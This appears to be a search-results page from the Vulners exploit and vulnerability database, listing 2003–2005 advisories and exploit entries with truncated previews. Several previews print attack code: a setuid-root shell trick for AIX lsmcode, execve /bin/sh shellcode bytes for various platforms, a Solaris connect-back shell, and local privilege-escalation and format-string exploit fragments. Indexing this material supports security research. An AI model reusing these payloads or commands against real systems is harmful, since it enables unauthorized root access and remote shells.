CVE Search Engine - Security Vulnerabilities and Exploits Search Tool | Vulners.com

🔥 Daily Hot!

💪🏽 CPE Enhanced Advisories

🕶 Shadow Exploits

🕵🏼 Vulners CPE

🔐 Security news

💻 Exploit updates

📑 Blogs review

🐧 Linux vulnerabilities

🤖 AI High Score

show all

407 matches found

Tenable Nessus•added 2005/10/05 12:0 a.m.•14 views

Slackware 10.0 / 10.1 / 10.2 / current : Mozilla/Firefox (SSA:2005-269-01)

New Mozilla and Firefox packages are available for Slackware 10.0, 10.1, 10.2, and -current to fix security issues: MFSA 2005-59 Command-line handling on Linux allows shell execution MFSA 2005-58 Firefox 1.0.7 / Mozilla Suite 1.7.12 Vulnerability Fixes MFSA 2005-57 IDN heap overrun using...

Exploits0References3

Mozilla•added 2005/09/22 12:0 a.m.•11 views

Command-line handling on Linux allows shell execution — Mozilla

URLs passed to Linux versions of Firefox and Thunderbird on the command-line were not correctly protected against interpretation by the shell. As a result a malicious URL can result in the execution of shell commands with the privileges of the user. If Firefox is set as the default handler for we...

Exploits0References1Affected Software3

0day.today•added 2005/04/05 12:0 a.m.•15 views

Aeon 0.2a Local Linux Exploit (perl code)

Exploit for linux platform in category local exploits ========================================= Aeon 0.2a Local Linux Exploit perl code ========================================= !/usr/bin/perl Aeon-mail relay agent for Linux written by lammat just for practice purposes tested against aeon-0.2a...

Exploit DB•added 2004/12/21 12:0 a.m.•80 views

AIX 4.3/5.1 < 5.3 - 'lsmcode' Execution Privilege Escalation

mkdirhier /tmp/aap/bin export DIAGNOSTICS=/tmp/aap cat /tmp/aap/bin/Dctrl EOF !/bin/sh cp /bin/sh /tmp/.shh chown root:system /tmp/.shh chmod u+s /tmp/.shh EOF chmod a+x /tmp/aap/bin/Dctrl lsmcode /tmp/.shh milw0rm.com 2004-12-21...

exploitpack•added 2004/10/16 12:0 a.m.•14 views

BSD bmon 1.2.1_2 - Local acls Bypass

BSD bmon 1.2.12 - Local acls Bypass !/usr/local/bin/bash Written by Idan Nahoum. [email protected] local exploit for FreeBSD/OpenBSD with bmon default: $BMONEXEC" "$" -gt "0" && BMONEXEC="$1" -x "$BMONEXEC" || echo "$BMONEXEC not found" exit cd /tmp apparently bmon closes stdout, so we run a shell wit...

0day.today•added 2004/09/26 12:0 a.m.•18 views

freebsd/x86 execve /bin/sh 37 bytes

Exploit for freebsd/x86 platform in category shellcode =================================== freebsd/x86 execve /bin/sh 37 bytes =================================== / This is FreeBSD execve code.It is 37 bytes long.I'll try to make it smaller.Till then use this one. signed predator...

seebug.org•added 2004/09/26 12:0 a.m.•17 views

linux/x86 execve /bin/sh alphanumeric 392 bytes

No description provided by source. / Linux/x86 execve of /bin/sh you can put 0-200 nops before shellcode nop = 0x47 = 'G' / char shellc = // nops here .. "LLLLXPY3E01E01u03u0fXh8eshXf5VJPfhbifhDefXf5AJfPDTYhKATYX5KATY" "PQTUX3H01H01X03X0YRX3E01E03U0Jfh2GfXf3E0f1E0f1U0fh88fX0E1f1E0f"...

Exploit DB•added 2004/09/26 12:0 a.m.•29 views

bsdi/x86 - execve /bin/sh toupper evasion 97 bytes

bsdi/x86 execve /bin/sh toupper evasion 97 bytes. Shellcode exploit for bsdix86 platform / BSDi shellcode jmp 0x57 pop %esi xor %ebx,%ebx add $0x8,%ebx add $0x2,%ebx mov %bl,0x26%esi xor %ebx,%ebx add $0x23,%ebx add $0x23,%ebx mov %bl,0xffffffa8%esi xor %ebx,%ebx add $0x26,%ebx add $0x30,%ebx mov...

Exploit DB•added 2004/09/26 12:0 a.m.•38 views

freebsd/x86 - execve /bin/sh 37 bytes

freebsd/x86 execve /bin/sh 37 bytes. Shellcode exploit for freebsdx86 platform / This is FreeBSD execve code.It is 37 bytes long.I'll try to make it smaller.Till then use this one. signed predator preedatoratsendmaildotru / char FreeBSDcode=...

Exploit DB•added 2004/09/26 12:0 a.m.•20 views

solaris/SPARC connect-back 204 bytes

solaris/SPARC connect-back 204 bytes. Shellcode exploit for solarissparc platform / Solaris shellcode - connects /bin/sh to a host Claes M. Nyberg 20020624 , / include / void mainvoid asm" ! Create socket mov 0x2, %o0 ! o0 = AFINET mov 0x2, %o1 ! o1 = SOCKSTREAM xor %o2, %o2, %o2 ! o2 = 0 mov 0xe...

Exploit DB•added 2004/09/26 12:0 a.m.•35 views

solaris/x86 execve /bin/sh toupper evasion 84 bytes

solaris/x86 execve /bin/sh toupper evasion 84 bytes. Shellcode exploit for solarisx86 platform / Solaris/x86 Used for toupper evasion look to the linux version for an explanation and usage example. / char c0de = / main: / "\xeb\x33" / jmp callz / / start: / "\x5e" / popl %esi / "\x8d\x06" / leal...

Exploit DB•added 2004/09/26 12:0 a.m.•32 views

Unixware execve /bin/sh 95 bytes

Unixware execve /bin/sh 95 bytes. Shellcode exploit for unixware platform / UnixWare execve of /bin/sh by K2 / char shell = "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4" "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"...

0day.today•added 2004/09/26 12:0 a.m.•38 views

bsd/x86 execve /bin/sh ENCRYPT* 57 bytes

Exploit for bsd/x86 platform in category shellcode ======================================== bsd/x86 execve /bin/sh ENCRYPT 57 bytes ======================================== / BSD version FreeBSD, OpenBSD, NetBSD. email protected 57 bytes. -Encriptado execve/bin/sh; Para mas informacion ver...

seebug.org•added 2004/09/26 12:0 a.m.•31 views

bsdi/x86 execve /bin/sh 46 bytes

No description provided by source. / BSDi execve of /bin/sh by v9 [email protected] / static char exec= "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c" / 14 characters. / "\x89\x76\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff" / 14 characters. /...

seebug.org•added 2004/09/12 12:0 a.m.•19 views

linux/x86 bsd/x86 execve /bin/sh 38 bytes

No description provided by source. / Linux/x86 and Bsd/x86 execve of /bin/sh by dymitri!!! / include stdio.h char code = "\x31\xc0" "\x50" "\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e" "\x89\xe3" "\x50" "\x54" "\x53" "\x50" "\x8c\xe0" "\x21\xc0" "\x74\x04" "\xb0\x3b" "\xeb\x07" / si es bsd saltam...

seebug.org•added 2004/09/12 12:0 a.m.•11 views

linux/x86 break chroot execve /bin/sh 80 bytes

No description provided by source. / This is Linux chroot/execve code.It is 80 bytes long.I have some ideas how to make it smaller, but till then use this one. signed predator linux registered user : 181116 preedatoratsendmaildotru / char...

Exploit DB•added 2004/09/12 12:0 a.m.•27 views

linux/ppc - execve /bin/sh 112 bytes

linux/ppc execve /bin/sh 112 bytes. Shellcode exploit for linuxppc platform / Linux PPC shellcode execve of /bin/sh by Palante / long shellcode = / Palante's linuxPPC shellcode w/ NULL/ 0x7CC63278, 0x2F867FFF, 0x41BC0054, 0x7C6802A6, 0xB0C3FFF9, 0xB0C3FFF1, 0x38867FF0, 0x38A67FF4, 0x38E67FF3,...

exploitpack•added 2004/06/25 12:0 a.m.•19 views

Rlpr 2.04 - msg() Remote Format String

Rlpr 2.04 - msg Remote Format String by jaguar !/usr/bin/python import os, sys, socket, struct, time, telnetlib class rlprd: fd = None pad = 2 00000000 31DB xor ebx,ebx 00000002 F7E3 mul ebx 00000004 B003 mov al,0x3 00000006 80C304 add bl,0x4 00000009 89E1 mov ecx,esp 0000000B 4A dec edx 0000000C...

exploitpack•added 2004/06/25 12:0 a.m.•12 views

UNIX 7th Edition binmkdir - Local Buffer Overflow

UNIX 7th Edition binmkdir - Local Buffer Overflow / Exploit for /bin/mkdir Unix V7 PDP-11. mkdir has a buffer overflow when checking if the directory in /arg/with/slashes/fname exists. This will run /bin/sh with euid 0, but not uid 0. Since the shell doesn't do anything special about this, we don...

Exploit DB•added 2003/04/18 12:0 a.m.•39 views

Apple Mac OSX 10.2.4 - DirectoryService 'PATH' Local Privilege Escalation

/ OS X include include include int mainint argc, char argv char ORIGPATH; int temp; if argc 2 if geteuid == 0 printf"euid is root.\n"; setuid0; execl"/bin/bash", "bash", NULL; strcpyORIGPATH, getenv"PATH"; printf"Original path: %s\n", ORIGPATH; setenv"PATH", ".", 1; printf"New path: %s\n",...

Rows per page

Query Builder

Family

Bulletin Type

Min CVSS Score

Date

Order by